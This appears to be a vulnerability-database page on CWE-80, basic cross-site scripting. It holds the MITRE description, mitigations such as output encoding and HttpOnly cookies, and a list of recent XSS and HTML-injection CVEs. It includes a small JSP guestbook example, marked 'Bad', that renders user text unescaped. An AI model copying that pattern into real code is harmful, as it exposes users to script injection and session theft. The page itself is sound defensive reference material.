Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) — Vulnerability Class 403

403 vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)). AI Chinese analysis included.

CWE-80 represents a critical input validation weakness where applications fail to properly sanitize user-supplied data before rendering it in web pages. This flaw allows attackers to inject malicious scripts, typically JavaScript, into the HTML content viewed by other users. Exploitation usually occurs when an attacker crafts a malicious URL or form input containing script tags, which the vulnerable application then executes in the victim’s browser without proper filtering. This can lead to severe consequences such as session hijacking, credential theft, or defacement. To mitigate this risk, developers must implement robust output encoding strategies, ensuring that all special characters like angle brackets and ampersands are converted into their safe HTML entity equivalents. Additionally, employing Content Security Policy headers and utilizing modern frameworks with built-in escaping mechanisms further reduces the attack surface by preventing the execution of unauthorized scripts.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityRead Application Data, Execute Unauthorized Code or Commands
An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
ImplementationCarefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
ImplementationUse and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
ImplementationWith Struts, write all data from form beans with the bean's filter attribute set to true.
ImplementationTo help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.
<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) { Entry e = (Entry) i.next(); %> <p>Entry #<%= e.getId() %></p> <p><%= e.getText() %></p> <% } %>
Bad · JSP
CVE IDTitleCVSSSeverityPublished
CVE-2021-47948 WordPress GetPaid Plugin 2.4.6 HTML Injection via Help Text — Payments Plugin GetPaid 5.4 Medium2026-05-10
CVE-2026-42030 MapServer: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in OpenLayers viewer — MapServer 6.1 Medium2026-05-08
CVE-2026-44264 Weblate is vulnerable to XSS via crafted Markdown — weblate 4.3 Medium2026-05-07
CVE-2026-6002 HTML Injection in DivvyDrive Information Technologies' DivvyDrive — DivvyDrive 8.8 High2026-05-07
CVE-2025-59854 HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability — DFXAnalytics 3.1 Low2026-05-06
CVE-2026-1564 Pega Platform versions 8.1.0 through 25.1.1 are affected by an HTML Injection vulnerability in a user interface component. Requires a high privileged user with a developer role. — Pega Infinity 5.5 -2026-04-15
CVE-2026-20170 Cisco Webex Contact Center 安全漏洞 — Cisco Webex Contact Center 6.1 Medium2026-04-15
CVE-2026-40105 XWiki has Reflected Cross-Site Scripting (XSS) in its page history compare functionality — xwiki-platform 8.8 -2026-04-15
CVE-2026-39425 MaxKB: Stored XSS via Unsanitized html_rander Tags in Markdown Rendering — MaxKB 5.4 -2026-04-14
CVE-2026-33657 EspoCRM: Stored HTML injection in email notifications about stream notes via unescaped post field — espocrm 4.6 Medium2026-04-13
CVE-2026-34718 Zammad improperly neutralizes of script-related HTML tags in ticket articles — zammad 5.4AIMediumAI2026-04-08
CVE-2026-39712 WordPress tagDiv Composer plugin <= 5.4.3 - Arbitrary Shortcode Execution vulnerability — tagDiv Composer 5.3 Medium2026-04-08
CVE-2026-39628 WordPress DukaMarket theme <= 1.3.0 - Arbitrary Shortcode Execution vulnerability — DukaMarket 5.3 Medium2026-04-08
CVE-2026-39629 WordPress Uminex theme <= 1.0.9 - Arbitrary Shortcode Execution vulnerability — Uminex 5.3 Medium2026-04-08
CVE-2026-39626 WordPress Armania theme <= 1.4.8 - Arbitrary Shortcode Execution vulnerability — Armania 5.3 Medium2026-04-08
CVE-2026-39625 WordPress TechOne theme <= 3.0.3 - Arbitrary Shortcode Execution vulnerability — TechOne 5.3 Medium2026-04-08
CVE-2026-39837 Stored XSS through the dynamic table format in Cargo — Mediawiki - Cargo Extension 6.1AIMediumAI2026-04-07
CVE-2026-39841 Stored XSS through list fields on Cargo's page values and Special:CargoTables — Mediawiki - Cargo Extension 6.1AIMediumAI2026-04-07
CVE-2026-39839 Stored XSS through URLs in Cargo's map format — Mediawiki - Cargo Extension 6.1AIMediumAI2026-04-07
CVE-2026-39344 Reflected XSS the login page through the 'username' parameter — CRM 6.1AIMediumAI2026-04-07
CVE-2026-35460 Papra has an HTML Injection in Transactional Emails via Unescaped User Display Name — papra 4.3 Medium2026-04-07
CVE-2025-66486 Multiple vulnerabilities have been addressed in IBM Aspera Shares — Aspera Shares 4.8 Medium2026-04-01
CVE-2026-1834 Ibtana - WordPress Website Builder <= 1.2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode — Ibtana – WordPress Website Builder 6.4 Medium2026-03-31
CVE-2026-2995 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in GitLab — GitLab 7.7 High2026-03-25
CVE-2026-32891 Anchorr Privilege Escalation: Jellyseerr User → Anchorr Admin via Stored XSS — Anchorr 9.1 Critical2026-03-20
CVE-2026-32753 FreeScout: Stored XSS through SVG file upload with filter bypass — freescout 6.1 -2026-03-19
CVE-2026-27166 Discourse vulnerable to HTML injection via prohibited iframe URLs — discourse 4.1 Medium2026-03-19
CVE-2026-32732 XSS in @leanprover/unicode-input-component — vscode-lean4 6.1AIMediumAI2026-03-13
CVE-2025-59540 Chamilo: Stored Cross-Site Scripting (XSS) in Chamilo LMS Exercise Feedback — chamilo-lms 4.8 -2026-03-06
CVE-2026-20070 Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Services Cross-Site Scripting Vulnerability — Cisco Secure Firewall Adaptive Security Appliance (ASA) Software 6.1 Medium2026-03-04

Vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) represent 403 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.